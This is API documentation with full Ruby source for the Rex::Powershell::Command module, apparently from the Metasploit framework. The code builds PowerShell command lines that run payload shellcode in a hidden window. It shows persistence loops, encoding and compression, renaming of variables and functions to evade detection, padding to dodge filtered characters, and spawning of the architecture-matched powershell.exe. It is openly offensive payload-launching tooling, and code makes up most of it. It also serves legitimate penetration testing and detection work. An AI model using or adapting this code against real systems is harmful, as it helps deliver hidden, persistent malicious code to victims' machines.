Module: Rex::Powershell::Command

Defined in:
lib/rex/powershell/command.rb

Class Method Summary collapse

Class Method Details

.cmd_psh_payload(pay, payload_arch, template_path, opts = {}) ⇒ String

Creates a powershell command line string which will execute the payload in a hidden window in the appropriate execution environment for the payload architecture. Opts are passed through to run_hidden_psh, generate_psh_command_line and generate_psh_args

Parameters:

  • pay (String)

    The payload shellcode

  • payload_arch (String)

    The payload architecture 'x86'/'x86_64'

  • opts (Hash) (defaults to: {})

    The options to generate the command

Options Hash (opts):

  • :persist (Boolean)

    Loop the payload to cause re-execution if the shellcode finishes

  • :prepend_sleep (Integer)

    Sleep for the specified time before executing the payload

  • :method (String)

    The powershell injection technique to use: 'net'/'reflection'/'old'

  • :encode_inner_payload (Boolean)

    Encodes the powershell script within the hidden/architecture detection wrapper

  • :encode_final_payload (Boolean)

    Encodes the final powershell script

  • :remove_comspec (Boolean)

    Removes the %COMSPEC% environment variable at the start of the command line

  • :use_single_quotes (Boolean)

    Wraps the -Command argument in single quotes unless :encode_final_payload

Returns:

  • (String)

    Powershell command line with payload



253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
# File 'lib/rex/powershell/command.rb', line 253

def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
  if opts[:encode_inner_payload] && opts[:encode_final_payload]
    fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
  end

  if opts[:no_equals] && !opts[:encode_final_payload]
    fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
  end

  psh_payload = case opts[:method]
                  when 'net'
                    Rex::Powershell::Payload.to_win32pe_psh_net(template_path, pay)
                  when 'reflection'
                    Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, pay)
                  when 'old'
                    Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
                  when 'msil'
                    fail RuntimeError, 'MSIL Powershell method no longer exists'
                  else
                    fail RuntimeError, 'No Powershell method specified'
                end

  # Run our payload in a while loop
  if opts[:persist]
    fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
    sleep_time = rand(5) + 5
    psh_payload  = "function #{fun_name}{#{psh_payload}};"
    psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
  end

  if opts[:prepend_sleep]
    if opts[:prepend_sleep].to_i > 0
      psh_payload = "Start-Sleep -s #{opts[:prepend_sleep]};" << psh_payload
    end
  end

  compressed_payload = compress_script(psh_payload, nil, opts)
  encoded_payload = encode_script(psh_payload, opts)

  # This branch is probably never taken...
  if encoded_payload.length <= compressed_payload.length
    smallest_payload = encoded_payload
    encoded = true
  else
    if opts[:encode_inner_payload]
      encoded = true
      compressed_encoded_payload = encode_script(compressed_payload)

      if encoded_payload.length <= compressed_encoded_payload.length
        smallest_payload = encoded_payload
      else
        smallest_payload = compressed_encoded_payload
      end
    else
      smallest_payload = compressed_payload
      encoded = false
    end
  end

  # Wrap in hidden runtime / architecture detection
  inner_args = opts.clone
  final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)

  command_args = {
      noprofile: true,
      windowstyle: 'hidden'
  }.merge(opts)

  if opts[:encode_final_payload]
    command_args[:encodedcommand] = encode_script(final_payload)

    # If '=' is a bad character pad the payload until Base64 encoded
    # payload contains none.
    if opts[:no_equals]
      while command_args[:encodedcommand].include? '='
        final_payload << ' '
        command_args[:encodedcommand] = encode_script(final_payload)
      end
    end
  else
    if opts[:use_single_quotes]
      # Escape Single Quotes
      final_payload.gsub!("'", "''")
      # Wrap command in quotes
      final_payload = "'#{final_payload}'"
    end

    command_args[:command] = final_payload
  end

  psh_command = generate_psh_command_line(command_args)

  if opts[:remove_comspec]
    command = psh_command
  else
    command = "%COMSPEC% /b /c start /b /min #{psh_command}"
  end

  if command.length > 8191
    fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
  end

  command
end

.compress_script(script_in, eof = nil, opts = {}) ⇒ String

Return a gzip compressed powershell script Will invoke PSH modifiers as enabled

Parameters:

  • script_in (String)

    Script contents

  • eof (String) (defaults to: nil)

    Marker to indicate the end of file appended to script

  • opts (Hash) (defaults to: {})

    The options for encoding

Options Hash (opts):

  • :strip_comments (Bool)

    Strip comments

  • :strip_whitespace (Bool)

    Strip whitespace

  • :sub_vars (Bool)

    Substitute variable names

  • :sub_funcs (Bool)

    Substitute function names

Returns:

  • (String)

    Compressed script with decompression stub



41
42
43
44
45
46
47
48
49
# File 'lib/rex/powershell/command.rb', line 41

def self.compress_script(script_in, eof=nil, opts={})
  # Build script object
  psh = Rex::Powershell::Script.new(script_in)
  psh.strip_comments if opts[:strip_comments]
  psh.strip_whitespace if opts[:strip_whitespace]
  psh.sub_vars if opts[:sub_vars]
  psh.sub_funcs if opts[:sub_funcs]
  psh.compress_code(eof)
end

.encode_script(script_in, eof = nil, opts = {}) ⇒ String

Return an encoded powershell script Will invoke PSH modifiers as enabled

Parameters:

  • script_in (String)

    Script contents

  • opts (Hash) (defaults to: {})

    The options for encoding

Options Hash (opts):

  • :strip_comments (Bool)

    Strip comments

  • :strip_whitespace (Bool)

    Strip whitespace

  • :sub_vars (Bool)

    Substitute variable names

  • :sub_funcs (Bool)

    Substitute function names

Returns:

  • (String)

    Encoded script



18
19
20
21
22
23
24
25
26
# File 'lib/rex/powershell/command.rb', line 18

def self.encode_script(script_in, eof=nil, opts={})
  # Build script object
  psh = Rex::Powershell::Script.new(script_in)
  psh.strip_comments if opts[:strip_comments]
  psh.strip_whitespace if opts[:strip_whitespace]
  psh.sub_vars if opts[:sub_vars]
  psh.sub_funcs if opts[:sub_funcs]
  psh.encode_code(eof)
end

.generate_psh_args(opts) ⇒ String

Generate arguments for the powershell command The format will be have no space at the start and have a space afterwards e.g. “-Arg1 x -Arg -Arg x ”

Parameters:

  • opts (Hash)

    The options to generate the command line

Options Hash (opts):

  • :shorten (Boolean)

    Whether to shorten the powershell arguments (v2.0 or greater)

  • :encodedcommand (String)

    Powershell script as an encoded command (-EncodedCommand)

  • :executionpolicy (String)

    The execution policy (-ExecutionPolicy)

  • :inputformat (String)

    The input format (-InputFormat)

  • :file (String)

    The path to a powershell file (-File)

  • :noexit (Boolean)

    Whether to exit powershell after execution (-NoExit)

  • :nologo (Boolean)

    Whether to display the logo (-NoLogo)

  • :noninteractive (Boolean)

    Whether to load a non interactive powershell (-NonInteractive)

  • :mta (Boolean)

    Whether to run as Multi-Threaded Apartment (-Mta)

  • :outputformat (String)

    The output format (-OutputFormat)

  • :sta (Boolean)

    Whether to run as Single-Threaded Apartment (-Sta)

  • :noprofile (Boolean)

    Whether to use the current users powershell profile (-NoProfile)

  • :windowstyle (String)

    The window style to use (-WindowStyle)

Returns:

  • (String)

    Powershell command arguments



108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
# File 'lib/rex/powershell/command.rb', line 108

def self.generate_psh_args(opts)
  return '' unless opts

  unless opts.key? :shorten
    opts[:shorten] = (opts[:method] != 'old')
  end

  arg_string = ' '
  opts.each_pair do |arg, value|
    case arg
      when :encodedcommand
        arg_string << "-EncodedCommand #{value} " if value
      when :executionpolicy
        arg_string << "-ExecutionPolicy #{value} " if value
      when :inputformat
        arg_string << "-InputFormat #{value} " if value
      when :file
        arg_string << "-File #{value} " if value
      when :noexit
        arg_string << '-NoExit ' if value
      when :nologo
        arg_string << '-NoLogo ' if value
      when :noninteractive
        arg_string << '-NonInteractive ' if value
      when :mta
        arg_string << '-Mta ' if value
      when :outputformat
        arg_string << "-OutputFormat #{value} " if value
      when :sta
        arg_string << '-Sta ' if value
      when :noprofile
        arg_string << '-NoProfile ' if value
      when :windowstyle
        arg_string << "-WindowStyle #{value} " if  value
    end
  end

  # Command must be last (unless from stdin - etc)
  if opts[:command]
    arg_string << "-Command #{opts[:command]}"
  end

  # Shorten arg if PSH 2.0+
  if opts[:shorten]
    # Invoke-Command and Out-File require these options to have
    # an additional space before to prevent Powershell code being
    # mangled.
    arg_string.gsub!(' -Command ', ' -c ')
    arg_string.gsub!('-EncodedCommand ', '-e ')
    arg_string.gsub!('-ExecutionPolicy ', '-ep ')
    arg_string.gsub!(' -File ', ' -f ')
    arg_string.gsub!('-InputFormat ', '-i ')
    arg_string.gsub!('-NoExit ', '-noe ')
    arg_string.gsub!('-NoLogo ', '-nol ')
    arg_string.gsub!('-NoProfile ', '-nop ')
    arg_string.gsub!('-NonInteractive ', '-noni ')
    arg_string.gsub!('-OutputFormat ', '-o ')
    arg_string.gsub!('-Sta ', '-s ')
    arg_string.gsub!('-WindowStyle ', '-w ')
  end

  # Strip off first space character
  arg_string = arg_string[1..-1]
  # Remove final space character
  arg_string = arg_string[0..-2] if (arg_string[-1] == ' ')

  arg_string
end

.generate_psh_command_line(opts) ⇒ String

Generate a powershell command line, options are passed on to generate_psh_args

Parameters:

  • opts (Hash)

    The options to generate the command line

Options Hash (opts):

  • :path (String)

    Path to the powershell binary

  • :no_full_stop (Boolean)

    Whether powershell binary should include .exe

Returns:

  • (String)

    Powershell command line with arguments



61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# File 'lib/rex/powershell/command.rb', line 61

def self.generate_psh_command_line(opts)
  if opts[:path] and (opts[:path][-1, 1] != '\\')
    opts[:path] << '\\'
  end

  if opts[:no_full_stop]
    binary = 'powershell'
  else
    binary = 'powershell.exe'
  end

  args = generate_psh_args(opts)

  "#{opts[:path]}#{binary} #{args}"
end

.run_hidden_psh(ps_code, payload_arch, encoded, opts = {}) ⇒ String

Wraps the powershell code to launch a hidden window and detect the execution environment and spawn the appropriate powershell executable for the payload architecture.

Parameters:

  • ps_code (String)

    Powershell code

  • payload_arch (String)

    The payload architecture 'x86'/'x86_64'

  • encoded (Boolean)

    Indicates whether ps_code is encoded or not

  • opts (Hash) (defaults to: {})

    The options for generate_psh_args

Returns:

  • (String)

    Wrapped powershell code



188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
# File 'lib/rex/powershell/command.rb', line 188

def self.run_hidden_psh(ps_code, payload_arch, encoded, opts={})
  opts[:noprofile] ||= 'true'
  opts[:windowstyle] ||= 'hidden'

  # Old method needs host process to stay open
  opts[:noexit] = true if (opts[:method] == 'old')

  if encoded
    opts[:encodedcommand] = ps_code
  else
    opts[:command] = ps_code.gsub("'", "''")
  end

  ps_args = generate_psh_args(opts)

  process_start_info = <<EOS
$s=New-Object System.Diagnostics.ProcessStartInfo
$s.FileName=$b
$s.Arguments='#{ps_args}'
$s.UseShellExecute=$false
$s.RedirectStandardOutput=$true
$s.WindowStyle='Hidden'
$s.CreateNoWindow=$true
$p=[System.Diagnostics.Process]::Start($s)
EOS
  process_start_info.gsub!("\n", ';')

  archictecure_detection = <<EOS
if([IntPtr]::Size -eq 4){
#{payload_arch == 'x86' ? "$b='powershell.exe'" : "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"}
}else{
#{payload_arch == 'x86' ? "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
};
EOS

  archictecure_detection.gsub!("\n", '')

  archictecure_detection + process_start_info
end